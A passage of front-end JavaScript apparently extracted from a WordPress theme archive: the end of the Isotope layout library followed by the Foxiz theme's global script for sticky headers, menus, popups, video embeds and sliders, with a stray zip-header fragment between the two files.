getValueGetter( attr, query ); // use second argument as a parser var parser = Isotope.sortDataParsers[ args[1] ]; // parse the value, if there was a parser sorter = parser ? function( elem ) { return elem && parser( getValue( elem ) ); } : // otherwise just return value function( elem ) { return elem && getValue( elem ); }; return sorter; } // get an attribute getter, or get text of the querySelector function getValueGetter( attr, query ) { // if query looks like [foo-bar], get attribute if ( attr ) { return function getAttribute( elem ) { return elem.getAttribute( attr ); }; } // otherwise, assume its a querySelector, and get its text return function getChildText( elem ) { var child = elem.querySelector( query ); return child && child.textContent; }; } return mungeSorter; })(); // parsers used in getSortData shortcut strings Isotope.sortDataParsers = { 'parseInt': function( val ) { return parseInt( val, 10 ); }, 'parseFloat': function( val ) { return parseFloat( val ); } }; // ----- sort method ----- // // sort filteredItem order proto._sort = function() { if ( !this.options.sortBy ) { return; } // keep track of sortBy History var sortBys = utils.makeArray( this.options.sortBy ); if ( !this._getIsSameSortBy( sortBys ) ) { // concat all sortBy and sortHistory, add to front, oldest goes in last this.sortHistory = sortBys.concat( this.sortHistory ); } // sort magic var itemSorter = getItemSorter( this.sortHistory, this.options.sortAscending ); this.filteredItems.sort( itemSorter ); }; // check if sortBys is same as start of sortHistory proto._getIsSameSortBy = function( sortBys ) { for ( var i=0; i < sortBys.length; i++ ) { if ( sortBys[i] != this.sortHistory[i] ) { return false; } } return true; }; // returns a function used for sorting function getItemSorter( sortBys, sortAsc ) { return function sorter( itemA, itemB ) { // cycle through all sortKeys for ( var i = 0; i < sortBys.length; i++ ) { var sortBy = sortBys[i]; var a = itemA.sortData[ sortBy ]; var b = itemB.sortData[ sortBy ]; if ( a > b || a < b ) { // if sortAsc is an object, use the value given the sortBy key var isAscending = sortAsc[ sortBy ] !== undefined ? sortAsc[ sortBy ] : sortAsc; var direction = isAscending ? 1 : -1; return ( a > b ? 1 : -1 ) * direction; } } return 0; }; } // -------------------------- methods -------------------------- // // get layout mode proto._mode = function() { var layoutMode = this.options.layoutMode; var mode = this.modes[ layoutMode ]; if ( !mode ) { // TODO console.error throw new Error( 'No layout mode: ' + layoutMode ); } // HACK sync mode's options // any options set after init for layout mode need to be synced mode.options = this.options[ layoutMode ]; return mode; }; proto._resetLayout = function() { // trigger original reset layout Outlayer.prototype._resetLayout.call( this ); this._mode()._resetLayout(); }; proto._getItemLayoutPosition = function( item ) { return this._mode()._getItemLayoutPosition( item ); }; proto._manageStamp = function( stamp ) { this._mode()._manageStamp( stamp ); }; proto._getContainerSize = function() { return this._mode()._getContainerSize(); }; proto.needsResizeLayout = function() { return this._mode().needsResizeLayout(); }; // -------------------------- adding & removing -------------------------- // // HEADS UP overwrites default Outlayer appended proto.appended = function( elems ) { var items = this.addItems( elems ); if ( !items.length ) { return; } // filter, layout, reveal new items var filteredItems = this._filterRevealAdded( items ); // add to filteredItems this.filteredItems = this.filteredItems.concat( filteredItems ); }; // HEADS UP overwrites default Outlayer prepended proto.prepended = function( elems ) { var items = this._itemize( elems ); if ( !items.length ) { return; } // start new layout this._resetLayout(); this._manageStamps(); // filter, layout, reveal new items var filteredItems = this._filterRevealAdded( items ); // layout previous items this.layoutItems( this.filteredItems ); // add to items and filteredItems this.filteredItems = filteredItems.concat( this.filteredItems ); this.items = items.concat( this.items ); }; proto._filterRevealAdded = function( items ) { var filtered = this._filter( items ); this.hide( filtered.needHide ); // reveal all new items this.reveal( filtered.matches ); // layout new items, no transition this.layoutItems( filtered.matches, true ); return filtered.matches; }; /** * Filter, sort, and layout newly-appended item elements * @param {Array or NodeList or Element} elems */ proto.insert = function( elems ) { var items = this.addItems( elems ); if ( !items.length ) { return; } // append item elements var i, item; var len = items.length; for ( i=0; i < len; i++ ) { item = items[i]; this.element.appendChild( item.element ); } // filter new stuff var filteredInsertItems = this._filter( items ).matches; // set flag for ( i=0; i < len; i++ ) { items[i].isLayoutInstant = true; } this.arrange(); // reset flag for ( i=0; i < len; i++ ) { delete items[i].isLayoutInstant; } this.reveal( filteredInsertItems ); }; var _remove = proto.remove; proto.remove = function( elems ) { elems = utils.makeArray( elems ); var removeItems = this.getItems( elems ); // do regular thing _remove.call( this, elems ); // bail if no items to remove var len = removeItems && removeItems.length; // remove elems from filteredItems for ( var i=0; len && i < len; i++ ) { var item = removeItems[i]; // remove item from collection utils.removeFrom( this.filteredItems, item ); } }; proto.shuffle = function() { // update random sortData for ( var i=0; i < this.items.length; i++ ) { var item = this.items[i]; item.sortData.random = Math.random(); } this.options.sortBy = 'random'; this._sort(); this._layout(); }; /** * trigger fn without transition * kind of hacky to have this in the first place * @param {Function} fn * @param {Array} args * @returns ret * @private */ proto._noTransition = function( fn, args ) { // save transitionDuration before disabling var transitionDuration = this.options.transitionDuration; // disable transition this.options.transitionDuration = 0; // do it var returnValue = fn.apply( this, args ); // re-enable transition for reveal this.options.transitionDuration = transitionDuration; return returnValue; }; // ----- helper methods ----- // /** * getter method for getting filtered item elements * @returns {Array} elems - collection of item elements */ proto.getFilteredItemElements = function() { return this.filteredItems.map( function( item ) { return item.element; }); }; // ----- ----- // return Isotope; })); PK!dG4\ddassets/js/global.jsnu[/** FOXIZ MAN SCRIPT */ var FOXIZ_MAIN_SCRIPTS = (function (Module, $) { 'use strict'; Module.initParams = function () { Module.body = $('body'); Module.iOS = /(iPad|iPhone|iPod)/g.test(navigator.userAgent); Module.document = $(document); Module.html = $('html, body'); Module.outerHTML = $('html'); Module.window = $(window); Module.ajaxData = {}; Module.themeSettings = foxizParams; Module.wPoint = {}; Module.sticky = {}; Module.eSticky = {}; Module.YTPlayers = {}; Module.articleData = []; Module.iframeAPIFlag = false; Module.bookmarkProgressing = false; Module.followProgressing = false; Module.readIndicator = $('#reading-progress'); Module.readIndicatorPercent = 0; } Module.init = function () { this.initParams(); this.removeBookmark(); this.followToggle(); this.topSpacing(); this.stickyNavBar(); this.stickyHeaderBuilder(); this.loginPopup(); this.siteAccessDetector(); this.headerDropdown(); this.mobileCollapse(); this.privacyTrigger(); this.popupNewsletter(); this.backTop(); this.hoverEffects(); this.paginationInfinite(); this.loadYoutubeIframe(); this.singleInfiniteLoadNext(); this.highlightShares(); this.readIndicatorInit(); this.fontResizer(); this.sliders(); this.carousels(); this.breakingNews(); this.liveSearch(); this.browserResize(); this.initSubMenuPos(); this.footerSlideUp(); this.documentReload(); }; Module.documentReload = function () { this.syncBookmark(); this.documentClick(); this.bookmarkToggle(); this.hoverTipsy(); this.paginationNextPrev(); this.paginationLoadMore(); this.showPostComment(); this.scrollToComment(); this.replyReview(); this.usersRating(); this.singleGallery(); this.floatingVideo(); this.videoPreview(); this.floatingVideoRemove(); this.scrollTableContent(); this.singleScrollRefresh(); this.productQuantity(); this.videoAutoPlay(); }; /** reload */ Module.reinitiateFunctions = function () { this.html.off(); this.document.off(); this.window.trigger('load'); this.documentReload(); }; Module.initElementor = function () { /** disable slider autoplay */ if (undefined != typeof FOXIZ_MAIN_SCRIPTS.themeSettings && undefined != typeof FOXIZ_MAIN_SCRIPTS.themeSettings.sliderSpeed) { FOXIZ_MAIN_SCRIPTS.themeSettings.sliderSpeed = 999999; } FOXIZ_MAIN_SCRIPTS.breakingNews(); FOXIZ_MAIN_SCRIPTS.carousels(); FOXIZ_MAIN_SCRIPTS.sliders(); if ('undefined' != typeof initDarkMode) { initDarkMode(); } } Module.isRTL = function () { return this.body.hasClass('rtl'); }; Module.animationFrame = function (callback) { var func = window.requestAnimationFrame || window.mozRequestAnimationFrame || window.webkitRequestAnimationFrame || this.animationFrameFallback func.call(window, callback) }; Module.animationFrameFallback = function (callback) { window.setTimeout(callback, 1000 / 60) } /** resize */ Module.browserResize = function () { var self = this; self.window.on('resize', function () { self.topSpacing(); self.calcSubMenuPos(); }) } /* ================================ HEADERS ================================ */ Module.hoverTipsy = function () { if (typeof $.fn.rbTipsy == 'undefined') { return false; } this.body.find('[data-copy]').rbTipsy({ title: 'data-copy', fade: true, opacity: 1, trigger: 'hover', gravity: 'n' }); if (window.innerWidth > 1024) { this.body.find('[data-title]').rbTipsy({ title: 'data-title', fade: true, opacity: 1, trigger: 'hover', gravity: 'n' }); } } /** font resizer */ Module.fontResizer = function () { var self = this; var size = sessionStorage.getItem('rubyResizerStep'); if (!size) { size = 1; } $('.font-resizer-trigger').on('click', function (e) { e.preventDefault(); e.stopPropagation(); size++; if (3 < size) { size = 1; self.body.removeClass('medium-entry-size big-entry-size') } else { if (2 == size) { self.body.addClass('medium-entry-size').removeClass('big-entry-size'); } else { self.body.addClass('big-entry-size').removeClass('medium-entry-size') } } sessionStorage.setItem('rubyResizerStep', size); }); } /** hover */ Module.hoverEffects = function () { var selectors = $('.effect-fadeout'); if (selectors.length > 0) { selectors.off('mouseenter mouseleave').on('mouseenter', function (e) { e.stopPropagation(); var target = $(this); if (!target.hasClass('activated')) { target.addClass('activated'); } }).on('mouseleave', function () { $(this).removeClass('activated'); }); } } Module.videoPreview = function () { $('.preview-trigger').on('mouseenter', function (e) { var target = $(this); var wrap = target.find('.preview-video'); if (!wrap.hasClass('video-added')) { var video = ''; wrap.append(video).addClass('video-added'); } target.addClass('show-preview'); wrap.css('z-index', 3); var el = target.find('video')[0]; if (el) { el.play(); } }).on('mouseleave', function () { var target = $(this); target.find('.preview-video').css('z-index', 1); var el = target.find('video')[0]; if (el) { el.pause(); } }); } Module.videoAutoPlay = function () { var self = this; var videos = $('.embed-video'); var nonResIframe = $('.entry-content > iframe'); if (videos != null && videos.length > 0) { videos.each(function () { var el = $(this); if (el.hasClass('is-autoplay') && !el.hasClass('autoplay-added')) { self.wPoint['iframe'] = new Waypoint({ element: el, handler: function () { var iframe = el.find('iframe'); self.initAutoPlay(iframe); el.addClass('autoplay-added'); this.destroy(); }, offset: '60%' }); } }) } if (nonResIframe != null && nonResIframe.length > 0) { nonResIframe.each(function () { var el = $(this); if (!el.hasClass('is-loaded')) { var iURL = el.attr('src'); if (iURL.indexOf('youtube.com') > 0 || iURL.indexOf('youtu.be') > 0 || iURL.indexOf('vimeo.com') > 0) { el.wrap('
    '); } } }) } }; Module.initAutoPlay = function (item) { if (item.length > 0 && 'undefined' != item[0]) { var src = item[0].src; if (src.indexOf('?') > -1) { item[0].src += "&autoplay=1"; } else { item[0].src += "?autoplay=1"; } } }; /** Header JS functions */ Module.headerDropdown = function () { var self = this; $('.more-trigger').on('click', function (e) { /** re calc menu */ self.calcSubMenuPos(); e.preventDefault(); e.stopPropagation(); var target = $(this); var holder = target.parents('.header-wrap').find('.more-section-outer'); if (!holder.hasClass('dropdown-activated')) { self.body.find('.dropdown-activated').removeClass('dropdown-activated'); holder.addClass('dropdown-activated'); } else { holder.removeClass('dropdown-activated'); } if (target.hasClass('search-btn')) { setTimeout(function () { holder.find('input[type="text"]').focus() }, 50); } return false; }); /** search trigger */ $('.search-trigger').on('click', function (e) { e.preventDefault(); e.stopPropagation(); var holder = $(this).parent('.header-dropdown-outer'); if (!holder.hasClass('dropdown-activated')) { self.body.find('.dropdown-activated').removeClass('dropdown-activated'); holder.addClass('dropdown-activated'); setTimeout(function () { holder.find('input[type="text"]').focus() }, 50); } else { holder.removeClass('dropdown-activated'); } return false; }); /** header dropdown */ $('.dropdown-trigger').on('click', function (e) { e.preventDefault(); e.stopPropagation(); var holder = $(this).parent('.header-dropdown-outer'); if (!holder.hasClass('dropdown-activated')) { self.body.find('.dropdown-activated').removeClass('dropdown-activated'); holder.addClass('dropdown-activated'); } else { holder.removeClass('dropdown-activated'); } }); } Module.topSpacing = function () { var self = this; if (self.body.hasClass('top-spacing')) { var height = $('.top-site-ad').outerHeight(); $('.site-outer').css('margin-top', height); } }; /** outside click */ Module.documentClick = function () { var self = this; $(document).on('click', function (e) { var wrapper = $('.more-section-outer, .header-dropdown-outer, .mobile-collapse, .mfp-wrap'); var absoluteSearch = $('.logo-sec-right .live-search-form-outer'); if (!wrapper.is(e.target) && wrapper.has(e.target).length === 0) { wrapper.removeClass('dropdown-activated'); self.outerHTML.removeClass('collapse-activated'); } if (!absoluteSearch.is(e.target) && absoluteSearch.has(e.target).length === 0) { absoluteSearch.find('.live-search-response').fadeOut(200); } }); } /** calc mega menu position */ Module.initSubMenuPos = function () { var self = this; var trigger = false; /** add delay to ensure image loaded */ setTimeout(function () { self.calcSubMenuPos(); }, 1000); /** re calc when hovering */ $('.menu-has-child-mega').on('mouseenter', function (e) { if (!trigger) { self.calcSubMenuPos(); } trigger = true; }) } Module.calcSubMenuPos = function () { if (window.outerWidth < 992) { return false; } var self = this; var megaParents = $('.menu-has-child-mega'); var headerWrapper = $('#site-header'); /** for mega wide */ if (megaParents.length > 0) { megaParents.each(function () { var item = $(this); item.find('.mega-dropdown').css({ 'width': self.body.width(), 'left': -item.offset().left, }); item.addClass('mega-menu-loaded') }) } /** sub-menu left right direction */ if (headerWrapper.length > 0) { var headerLeftOffset = headerWrapper.offset().left; var headerWidth = headerWrapper.width(); var headerRightOffset = headerLeftOffset + headerWidth; var flexDropdown = $('.flex-dropdown'); /** sub menu direction */ var subElements = $('ul.sub-menu'); if (subElements.length > 0) { subElements.each(function () { var item = $(this); var itemLeftOffset = item.offset().left; var itemRightOffset = itemLeftOffset + item.width() + 100; if (itemRightOffset > headerRightOffset) { item.addClass('left-direction'); } }) } /** calc dropdown flex width */ if (flexDropdown.length > 0) { flexDropdown.each(function () { var item = $(this); var parentItem = item.parent(); if (parentItem.hasClass('is-child-wide')) { return; } var itemWidth = item.width(); var itemHalfWidth = itemWidth / 2; var parentItemOffset = parentItem.offset().left; var parentHalfWidth = parentItem.width() / 2; var parentItemCenterOffset = parentItemOffset + parentHalfWidth; var rightSpacing = headerRightOffset - parentItemCenterOffset; var leftSpacing = parentItemCenterOffset - headerLeftOffset; if (itemWidth >= headerWidth) { item.css({ 'width': headerWidth - 2, 'left': -parentItemOffset }); } else if (itemHalfWidth > rightSpacing) { item.css({ 'right': -rightSpacing + parentHalfWidth + 1, 'left': 'auto', }); } else if (itemHalfWidth > leftSpacing) { item.css({ 'left': -leftSpacing + parentHalfWidth + 1, 'right': 'auto', }); } else { item.css({ 'right': 'auto', 'left': -itemHalfWidth + parentHalfWidth, }); } }); } } } /** * * @returns {boolean} */ Module.stickyNavBar = function () { var self = this; /** turn off sticky on editor mode */ if (self.body.hasClass('elementor-editor-active')) { return false; } var holder = $('#sticky-holder'); var alert = $('#header-alert'); self.sticky.outer = $('#navbar-outer'); if ((!self.body.hasClass('is-mstick') && !self.body.hasClass('yes-tstick')) || self.sticky.outer.length < 1 || holder.length < 1) { return false; } self.sticky.smartSticky = false; self.sticky.adminBarSpacing = 0; self.sticky.isTitleSticky = 0; self.sticky.isSticky = false; self.sticky.lastScroll = 0; self.sticky.topOffset = self.sticky.outer.offset().top; self.sticky.activatePos = self.sticky.topOffset + 1 + holder.height(); self.sticky.deactivePos = self.sticky.topOffset - self.sticky.adminBarSpacing; if (alert.length > 0) { self.sticky.outer.css('min-height', holder.outerHeight()); } if (self.body.hasClass('admin-bar')) { self.sticky.adminBarSpacing = 32; } if (self.body.hasClass('is-smart-sticky') && !self.body.hasClass('yes-tstick')) { self.sticky.smartSticky = true; } if (!self.sticky.smartSticky) { if (self.body.hasClass('yes-tstick')) { self.sticky.isTitleSticky = true; self.sticky.activatePos = self.sticky.activatePos + 400; self.sticky.deactivePos = self.sticky.deactivePos + 400; } if (window.addEventListener) { window.addEventListener('scroll', function () { if (self.debouncePos) clearTimeout(self.debouncePos); self.debouncePos = setTimeout(function () { self.debouncePos = null; if (alert.length > 0) { self.sticky.outer.css('min-height', holder.outerHeight()); } self.sticky.topOffset = self.sticky.outer.offset().top; self.sticky.activatePos = self.sticky.topOffset + 1 + holder.height(); self.sticky.deactivePos = self.sticky.topOffset - self.sticky.adminBarSpacing; self.sticky.activatePos = self.sticky.activatePos + 400; self.sticky.deactivePos = self.sticky.deactivePos + 400; }, 400); self.animationFrame(self.initStickyNavBar.bind(self)); }, false); } } else { if (window.addEventListener) { window.addEventListener('scroll', function () { if (self.debouncePos) clearTimeout(self.debouncePos); self.debouncePos = setTimeout(function () { self.debouncePos = null; if (alert.length > 0) { self.sticky.outer.css('min-height', holder.outerHeight()); } self.sticky.topOffset = self.sticky.outer.offset().top; self.sticky.activatePos = self.sticky.topOffset + 1 + holder.height(); self.sticky.deactivePos = self.sticky.topOffset - self.sticky.adminBarSpacing; }, 400); self.animationFrame(self.initSmartStickyNavBar.bind(self)); }, false); } } } Module.initStickyNavBar = function () { var self = this; var scroll = self.window.scrollTop(); if (!self.sticky.isSticky && scroll > self.sticky.activatePos) { self.sticky.isSticky = true; self.body.addClass('sticky-on'); } else if (self.sticky.isSticky && scroll <= self.sticky.deactivePos) { self.sticky.isSticky = false; if (!self.sticky.isTitleSticky) { self.body.removeClass('sticky-on'); } else { self.body.addClass('unstick-animated'); self.sticky.animationTimeout = setTimeout(function () { self.body.removeClass('sticky-on unstick-animated'); }, 150); } } } Module.initSmartStickyNavBar = function () { var self = this; var scroll = self.window.scrollTop(); if (!self.sticky.isSticky && scroll > self.sticky.activatePos && scroll < self.sticky.lastScroll) { self.sticky.isSticky = true; self.body.addClass('sticky-on'); } else if (self.sticky.isSticky && (scroll <= self.sticky.deactivePos || scroll > self.sticky.lastScroll)) { self.sticky.isSticky = false; self.body.removeClass('sticky-on'); } self.sticky.lastScroll = scroll; } /** * header template sticky */ Module.stickyHeaderBuilder = function () { var self = this; /** turn off sticky on editor mode */ if (self.body.hasClass('elementor-editor-active')) { return false; } var stickySection = $('.header-template .e-section-sticky').first(); var stitleStickySection = $('body.single-post .e-stitle-sticky').first(); if (stitleStickySection.length > 0) { self.body.addClass('yes-tstick'); stitleStickySection.addClass('e-section-sticky'); stickySection = stitleStickySection; } if (stickySection.length < 1) { return false; } var stickyHeight = stickySection.outerHeight(); self.eSticky.outer = stickySection.parent(); self.eSticky.outer.css('min-height', self.eSticky.outer.outerHeight()); self.eSticky.smartSticky = false; self.eSticky.adminBarSpacing = 0; self.eSticky.isTitleSticky = 0; self.eSticky.isSticky = false; self.eSticky.lastScroll = 0; self.eSticky.topOffset = stickySection.offset().top; self.eSticky.activatePos = self.eSticky.topOffset + 1 + stickyHeight; self.eSticky.deactivePos = self.eSticky.topOffset - self.eSticky.adminBarSpacing; if (self.body.hasClass('admin-bar')) { self.eSticky.adminBarSpacing = 32; } if (stickySection.hasClass('is-smart-sticky') && !self.body.hasClass('yes-tstick')) { self.eSticky.smartSticky = true; } /** eSticky */ if (!self.eSticky.smartSticky) { if (self.body.hasClass('yes-tstick')) { self.eSticky.isTitleSticky = true; self.eSticky.activatePos = self.eSticky.activatePos + 400; self.eSticky.deactivePos = self.eSticky.deactivePos + 400; } if (window.addEventListener) { window.addEventListener('scroll', function () { if (self.debouncePos) clearTimeout(self.debouncePos); self.debouncePos = setTimeout(function () { self.debouncePos = null; var stickyHeight = stickySection.outerHeight(); self.eSticky.outer.css('min-height', self.eSticky.outer.outerHeight()); self.eSticky.topOffset = self.eSticky.outer.offset().top; self.eSticky.activatePos = self.eSticky.topOffset + 1 + stickyHeight; self.eSticky.deactivePos = self.eSticky.topOffset - self.eSticky.adminBarSpacing; self.eSticky.activatePos = self.eSticky.activatePos + 400; self.eSticky.deactivePos = self.eSticky.deactivePos + 400; }, 400); self.animationFrame(self.initStickyESection.bind(self)); }, false); } } else { if (window.addEventListener) { window.addEventListener('scroll', function () { if (self.debouncePos) clearTimeout(self.debouncePos); self.debouncePos = setTimeout(function () { self.debouncePos = null; var stickyHeight = stickySection.outerHeight(); self.eSticky.outer.css('min-height', self.eSticky.outer.outerHeight()); self.eSticky.topOffset = self.eSticky.outer.offset().top; self.eSticky.activatePos = self.eSticky.topOffset + 1 + stickyHeight; self.eSticky.deactivePos = self.eSticky.topOffset - self.eSticky.adminBarSpacing; }, 400); self.animationFrame(self.initSmartStickyESection.bind(self)); }, false); } } } Module.initStickyESection = function () { var self = this; var scroll = self.window.scrollTop(); if (!self.eSticky.isSticky && scroll > self.eSticky.activatePos) { self.eSticky.isSticky = true; self.body.addClass('sticky-on'); } else if (self.eSticky.isSticky && scroll <= self.eSticky.deactivePos) { self.eSticky.isSticky = false; if (!self.eSticky.isTitleSticky) { self.body.removeClass('sticky-on'); } else { self.body.addClass('unstick-animated'); self.eSticky.animationTimeout = setTimeout(function () { self.body.removeClass('sticky-on unstick-animated'); }, 150); } } } Module.initSmartStickyESection = function () { var self = this; var scroll = self.window.scrollTop(); if (!self.eSticky.isSticky && scroll > self.eSticky.activatePos && scroll < self.eSticky.lastScroll) { self.eSticky.isSticky = true; self.body.addClass('sticky-on'); } else if (self.eSticky.isSticky && (scroll <= self.eSticky.deactivePos || scroll > self.eSticky.lastScroll)) { self.eSticky.isSticky = false; self.body.removeClass('sticky-on'); } self.eSticky.lastScroll = scroll; } /** * mobileCollapse */ Module.mobileCollapse = function () { var self = this; $('.mobile-menu-trigger').on('click', function (e) { e.preventDefault(); e.stopPropagation(); var target = $(this); if (target.hasClass('mobile-search-icon')) { setTimeout(function () { self.outerHTML.find('.header-search-form input[type="text"]').focus() }, 50); } if (!self.outerHTML.hasClass('collapse-activated')) { self.outerHTML.addClass('collapse-activated'); } else { self.outerHTML.removeClass('collapse-activated'); } }); } /** * privacy trigger */ Module.privacyTrigger = function () { $('#privacy-trigger').on('click', function (e) { e.preventDefault(); e.stopPropagation(); localStorage.setItem('RubyPrivacyAllowed', '1'); $('#rb-privacy').slideUp(250, function () { $(this).remove(); }); return false; }); } /** back top */ Module.backTop = function () { if (this.body.hasClass('is-backtop')) { $().UItoTop({ text: '', }); } }; Module.SetTTLStorage = function (id, value, ttl) { var data = { value: value, ttl: Date.now() + ttl * 3600000 } localStorage.setItem(id, JSON.stringify(data)); } Module.getTTLStorage = function (id) { var data = localStorage.getItem(id); if (!data) { return null; } data = JSON.parse(data); if (Date.now() > data.ttl) { localStorage.removeItem(data); return null; } return data.value; } /** login popup */ Module.loginPopup = function () { var toggle = $('.login-toggle'); var form = $('#rb-user-popup-form'); if (toggle.length > 0 && form.length > 0) { toggle.on('click', function (e) { e.preventDefault(); e.stopPropagation(); $.magnificPopup.open({ type: 'inline', preloader: false, removalDelay: 500, showCloseBtn: true, closeBtnInside: true, closeOnBgClick: true, items: { src: form, type: 'inline' }, mainClass: 'popup-animation', closeMarkup: '', fixedBgPos: true, fixedContentPos: true }); }) } } /** * newsletter */ Module.popupNewsletter = function () { var self = this; var target = $('#rb-popup-newsletter'); if (target.length > 0) { var display = target.data('display'); self.newsletterExpired = target.data('expired'); self.newsletterDisplayOffset = target.data('offset'); var delay = target.data('delay'); var oldExpired = localStorage.getItem('RubyNewsletterExpired'); if (!oldExpired || self.newsletterExpired != oldExpired) { localStorage.setItem('RubyNewsletterExpired', self.newsletterExpired); localStorage.removeItem('RubyNewsletter'); } if (!self.getTTLStorage('RubyNewsletter')) { if (!display || 'scroll' == display) { if (window.addEventListener) { window.addEventListener('scroll', function () { self.animationFrame(self.scrollPopupNewsletter.bind(self)); }, false); } } else { setTimeout(function () { self.popupNewsletterInit(); }, delay); } } } } Module.scrollPopupNewsletter = function () { var self = this; if (!self.newsletterPopupFlag && self.window.scrollTop() > self.newsletterDisplayOffset) { self.newsletterPopupFlag = true; self.popupNewsletterInit(); } } Module.popupNewsletterInit = function () { var self = this; $.magnificPopup.open({ type: 'inline', preloader: false, closeBtnInside: true, removalDelay: 500, showCloseBtn: true, closeOnBgClick: false, disableOn: 1024, items: { src: '#rb-popup-newsletter', type: 'inline' }, mainClass: 'popup-animation', fixedBgPos: true, fixedContentPos: true, closeMarkup: '', callbacks: { close: function () { self.SetTTLStorage('RubyNewsletter', 1, self.newsletterExpired * 24); } } }); } /** footer slide up */ Module.footerSlideUp = function () { var target = $('#footer-slideup'); if (target.length > 0) { var self = this; self.footerSlideUpExpired = target.data('expired'); var delay = target.data('delay'); var oldExpired = localStorage.getItem('footerSlideUpExpired'); if (!oldExpired || self.footerSlideUpExpired != oldExpired) { localStorage.setItem('footerSlideUpExpired', self.footerSlideUpExpired); localStorage.removeItem('footerSlideUp'); } if (!self.getTTLStorage('footerSlideUp')) { setTimeout(function () { self.footerSlideUpInit(); }, delay); } /** show hide toggle */ setTimeout(function () { self.footerSlideUpToggle(); }, delay); } } Module.footerSlideUpToggle = function () { var self = this; $('.slideup-toggle').off('click').on('click', function (e) { e.preventDefault(); e.stopPropagation(); self.footerSlideUpInit(); return false; }); } Module.footerSlideUpInit = function () { if (this.body.hasClass('yes-f-slideup')) { this.body.removeClass('yes-f-slideup'); this.SetTTLStorage('footerSlideUp', 1, this.footerSlideUpExpired * 24); } else { this.body.addClass('yes-f-slideup'); localStorage.removeItem('footerSlideUp'); } } /** youtube iframe */ Module.loadYoutubeIframe = function () { var self = this; var blockPlaylist = $('.yt-playlist'); if (blockPlaylist.length > 0) { var tag = document.createElement('script'); tag.src = "//www.youtube.com/iframe_api"; var firstScriptTag = document.getElementsByTagName('script')[0]; firstScriptTag.parentNode.insertBefore(tag, firstScriptTag); } window.onYouTubeIframeAPIReady = function () { $('.yt-playlist').each(function () { var target = $(this); var iframe = target.find('.yt-player'); var videoID = target.data('id'); var blockID = target.data('block'); self.YTPlayers[blockID] = new YT.Player(iframe.get(0), { height: '540', width: '960', videoId: videoID, events: { 'onReady': self.videoPlayToggle, 'onStateChange': self.videoPlayToggle } }); }); $('.plist-item').on('click', function (e) { e.preventDefault(); e.stopPropagation(); var wrapper = $(this).parents('.yt-playlist'); var currentBlockID = wrapper.data('block'); var videoID = $(this).data('id'); var title = $(this).text(); var meta = $(this).data('index'); Object.keys(self.YTPlayers).forEach(function (id) { self.YTPlayers[id].pauseVideo(); }); self.YTPlayers[currentBlockID].loadVideoById({ 'videoId': videoID }); wrapper.find('.yt-trigger').addClass('is-playing'); wrapper.find('.play-title').hide().text(title).fadeIn(250); wrapper.find('.video-index').text(meta); }); }; } Module.videoPlayToggle = function () { var players = FOXIZ_MAIN_SCRIPTS.YTPlayers; $('.yt-trigger').on('click', function (e) { e.preventDefault(); e.stopPropagation(); var target = $(this); var currentBlockID = target.parents('.yt-playlist').data('block'); var currentState = players[currentBlockID].getPlayerState(); if (-1 == currentState || 0 == currentState || 2 == currentState || 5 == currentState) { players[currentBlockID].playVideo(); target.addClass('is-playing'); } else { players[currentBlockID].pauseVideo(); target.removeClass('is-playing'); } }) } /** Comment scripts */ Module.showPostComment = function () { $('.show-post-comment').off('click').on('click', function (e) { e.preventDefault(); e.stopPropagation(); var wrap = $(this).parent(); $(this).fadeOut(250, function () { $(this).remove(); wrap.find('.is-invisible').removeClass('is-invisible'); wrap.next('.comment-holder').removeClass('is-hidden'); }) }); }; /** table scroll */ Module.scrollTableContent = function () { var self = this; $('.anchor-link').on('click', function (e) { e.stopPropagation(); /** support special language */ var target = $(this).data('index'); self.html.animate({ scrollTop: $('.' + target).offset().top - 75 }, 400); }); } /** scroll to comment */ Module.scrollToComment = function () { var commentBtn = $('.show-post-comment'); var self = this; if (commentBtn.length > 0) { var hash = window.location.hash; if ('#respond' == hash || '#comment' == hash.substring(0, 8)) { commentBtn.trigger('click'); self.html.animate({scrollTop: commentBtn.offset().top}, 400); } } }; Module.replyReview = function () { var replyLink = $('.comment-reply-link'); replyLink.on('click', function () { var target = $(this); var wrapper = target.parents('.rb-reviews-area'); if (wrapper.length > 0) { var cancelLink = $('#cancel-comment-reply-link'); wrapper.find('.rb-form-rating').addClass('is-hidden'); cancelLink.on('click', function () { wrapper.find('.rb-form-rating').removeClass('is-hidden'); }); } }); }; /** user rating */ Module.usersRating = function () { var self = this; var reviewsForm = self.body.find('.rb-reviews-form'); if (reviewsForm.length > 0) { reviewsForm.each(function () { var reviewForm = $(this); if (!reviewForm.hasClass('is-loaded')) { reviewForm.addClass('is-loaded'); var ratingForm = reviewForm.find('.rb-form-rating'); var selection = reviewForm.find('.rb-rating-selection'); var text = reviewForm.find('.rating-alert').html(); var ratingValue = null; selection.val(''); selection.hide(); selection.before( '
    \ \ \ \ \ \ \ \
    ' ); ratingForm.on('click', 'a.star', function (e) { e.preventDefault(); e.stopPropagation(); var star = $(this); ratingValue = star.data('rating'); star.siblings('a').removeClass('active'); star.addClass('active'); ratingForm.addClass('selected'); }); reviewForm.on('click', '#respond #submit', function () { selection.val(ratingValue); if (!selection.val()) { window.alert(text); return false; } }); } }); } }; /** * * @returns {boolean} */ Module.readIndicatorInit = function () { var self = this; if (!self.body.hasClass('single-post') || self.readIndicator.length < 1) { return false; } var content = $('div[itemprop="articleBody"]'); content = content.eq(0); self.indicatorTop = content.offset().top; self.indicatorHeight = content.outerHeight(true) - self.window.height(); if (window.addEventListener) { window.addEventListener('scroll', function () { self.animationFrame(self.readIndicatorCalc.bind(self)); }, false); } } Module.readIndicatorCalc = function () { var self = this; var scroll = self.window.scrollTop(); self.readIndicatorPercent = ((scroll - self.indicatorTop) / self.indicatorHeight) * 100; if (self.readIndicatorPercent <= 130) { self.readIndicator.css('width', self.readIndicatorPercent + '%'); } } /** breaking news */ Module.breakingNews = function () { var self = this; var breakingNews = $('.breaking-news-slider'); if (breakingNews.length < 1) { return false; } breakingNews.each(function () { var el = $(this); var params = { slidesPerView: 1, loop: true, } if (el.data('play')) { params.autoplay = { delay: self.themeSettings.sliderSpeed, pauseOnMouseEnter: true, stopOnLastSlide: true, disableOnInteraction: true, } if (el.data('speed')) { params.autoplay.delay = el.data('speed'); } } params.navigation = { nextEl: el.find('.breaking-news-next')[0], prevEl: el.find('.breaking-news-prev')[0] } new RBSwiper(this, params); }); } /** overlay slider */ Module.sliders = function () { var self = this; var sliders = $('.post-slider'); if (sliders.length < 1) { return false; } sliders.each(function () { var slider = $(this); var params = { grabCursor: true, allowTouchMove: true, effect: self.themeSettings.sliderEffect, loop: true, } if (slider.data('play')) { 